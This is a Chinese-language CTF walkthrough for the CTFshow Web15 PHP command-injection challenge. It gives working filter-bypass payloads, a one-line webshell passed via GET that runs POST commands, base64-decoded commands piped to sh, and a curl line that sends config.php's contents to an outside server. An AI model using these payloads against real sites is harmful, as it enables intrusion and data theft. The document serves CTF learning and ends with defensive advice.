CTFshow Web15：突破PHP命令执行限制的实战技巧

1. 理解PHP命令执行漏洞的本质

PHP命令执行漏洞是Web安全中常见的攻击面之一。简单来说，当开发者不恰当地使用eval()、system()、exec()等函数时，攻击者就能通过精心构造的输入，让服务器执行任意系统命令。这就像是你家的门锁坏了，小偷可以直接推门而入。

在CTFshow Web15这道题目中，我们需要突破的关键点有两个：一是绕过关键字的过滤，二是利用GET和POST请求的差异。题目给出的源码中，过滤了system、exec、cat等常见命令执行函数，还过滤了(、.、php、config等关键字符。乍一看好像无路可走，但仔细分析就会发现，分号;没有被过滤，这就是我们的突破口。

2. 突破关键字过滤的三种思路

2.1 使用反引号替代函数调用

在PHP中，反引号（`）和shell_exec()函数功能相同，都可以执行系统命令。题目过滤了常见的命令执行函数，但很可能没有过滤反引号。我们可以构造这样的payload：

echo `whoami`;

这行代码会执行whoami命令并输出结果。相比使用system("whoami")，这种方式完全避开了对函数名的过滤。

2.2 利用字符串拼接绕过关键字检测

虽然题目过滤了config和php等关键字，但我们可以通过字符串拼接来绕过。例如：

$f = "con"."fig".".ph"."p"; echo file_get_contents($f);

这种方法把被过滤的关键字拆分成多个部分，再拼接起来使用。不过需要注意的是，题目还过滤了.和(，所以需要根据实际情况调整策略。

2.3 利用变量变量特性

PHP的变量变量特性也能帮助我们绕过一些过滤：

$a = "_POST"; $b = $$a; echo $b['cmd'];

这段代码通过变量变量间接访问了$_POST['cmd']，可以绕过对$_POST的直接检测。在实际CTF比赛中，这种技巧经常能出奇制胜。

3. GET和POST请求的差异利用

3.1 理解请求方法的过滤差异

题目中一个关键点是：过滤规则只适用于GET请求的参数，而POST请求没有限制。这就好比前门有保安严格检查，但后门却无人看守。我们可以利用这个差异：

1. 通过GET请求传递一个最小化的PHP代码，建立执行环境
2. 通过POST请求传递实际的系统命令，避开所有过滤

3.2 构造一句话木马

首先，我们通过GET请求传递一个简单的一句话木马：

/?c=echo `$_POST[a]`;

这行代码的意思是：执行POST参数a中的内容作为系统命令，并输出结果。因为使用了反引号，所以不需要调用任何被过滤的函数。

3.3 使用Burp Suite修改请求

虽然可以直接在浏览器地址栏输入GET请求，但要发送POST请求，最好使用Burp Suite这样的工具：

1. 在浏览器中访问带有payload的URL
2. 用Burp Suite拦截这个请求
3. 修改请求方法为POST
4. 添加POST参数：a=cat config.php
5. 发送请求并查看响应

4. 实战操作：获取flag的完整流程

4.1 初步信息收集

访问题目页面后，首先查看源码，通常会给出一些提示。比如本题提示flag在config.php文件中。确认这一点很重要，因为后续所有操作都围绕读取这个文件展开。

4.2 构造初始payload

根据前面的分析，我们构造GET请求的payload：

http://example.com/?c=echo `$_POST[a]`;

这个payload利用了三个关键点：

1. 使用反引号执行命令，绕过函数名过滤
2. 通过$_POST接收后续命令，避开GET参数的过滤
3. 使用分号分隔语句，因为题目没有过滤分号

4.3 发送POST请求

使用Burp Suite发送POST请求时，需要注意两点：

1. 设置正确的Content-Type：

Content-Type: application/x-www-form-urlencoded

2. POST数据格式：

a=cat config.php

如果直接访问页面没有显示内容，不要慌，这是正常现象。右键查看网页源码，通常flag就藏在里面。

5. 进阶技巧与注意事项

5.1 处理无回显的情况

有时候命令执行后没有直接输出，可以考虑以下几种方法：

1. 把结果写入web目录下的文件：

echo `$_POST[a]` > /var/www/html/result.txt

2. 使用DNS外带数据：

echo `curl http://your-server.com/?data=$(cat config.php | base64)`;

3. 延时判断：通过sleep命令判断命令是否执行

5.2 绕过更严格的过滤

如果遇到更严格的过滤，可以尝试：

1. 使用编码绕过：比如base64编码命令

echo `echo "Y2F0IGNvbmZpZy5waHA=" | base64 -d | sh`;

2. 利用环境变量：

echo `$PATH../../../../../bin/cat config.php`;

3. 使用通配符：

echo `cat c*.*p*`;

5.3 安全防护建议

从防御角度，开发者应该：

1. 尽量避免使用eval()等危险函数
2. 如果必须使用，要严格过滤所有输入
3. 使用白名单而非黑名单机制
4. 对命令执行函数设置禁用列表
5. 定期更新和修补系统漏洞

6. 常见问题排查

在实际操作中，可能会遇到各种问题。以下是几个常见问题及解决方法：

1. 页面没有任何反应：检查命令是否正确执行，尝试简单的whoami命令测试
2. 出现500错误：可能是语法错误，检查PHP代码是否完整
3. 命令被拦截：尝试使用其他命令或编码方式
4. 找不到config.php：尝试绝对路径如/var/www/html/config.php

记住，CTF题目通常设计有明确的解题路径，如果遇到阻碍，可能是思路需要调整。多尝试不同的方法，结合题目给出的提示信息，往往能找到突破口。